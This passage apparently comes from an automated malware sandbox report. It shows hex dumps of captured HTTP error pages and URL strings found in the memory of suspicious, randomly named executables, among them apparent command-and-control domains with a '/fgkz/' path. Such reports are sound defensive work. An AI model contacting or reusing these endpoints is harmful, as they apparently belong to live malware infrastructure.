6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 78244037-ccc2-4297-85d4-ff9e3a2f927cx-runtime: 0.036430content-length: 16984connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6cc8d1b1-c997-4ad8-b0ba-aee70f1a65fax-runtime: 0.029674content-length: 17007connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6423d2d3-1d81-406a-820f-58718bafdc34x-runtime: 0.038536content-length: 18019connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20

Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: print.exe, 00000010.00000002.4497033740.0000000003E92000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003A82000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schema.org
Source: UnmxRI.exe, 00000000.00000002.2086201250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, tehuvFgZlLZK.exe, 0000000A.00000002.2169047373.00000000026E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: print.exe, 00000010.00000002.4497033740.000000000384A000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.000000000343A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://ww1.nexgen-gaming.com
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.ListingZen.com
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.noobblaster.com
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.noobblaster.com/fgkz/
Source: print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004712000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6J
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/assets/jquery/dist/jquery.min.js
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/assets/materialize/dist/js/materialize.min.js
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/assets/pusher-js/dist/web/pusher.js
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/build/css/compiled/backend/backend-f2bf381915.css
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.js
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/contact
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/faq
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/favicon.ico
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/img/site/dark_logo.png
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/img/site/dark_logo_250.jpg
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/img/site/light_icon.png
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/img/site/light_logo.png
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/js/compiled/unlogged/unlogged.js
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/login
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/marketplace
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/pricing
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/pricing#pricing
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/privacy
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/profile
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/register
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/sitemap.xml
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theranchobizarro.com/terms
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
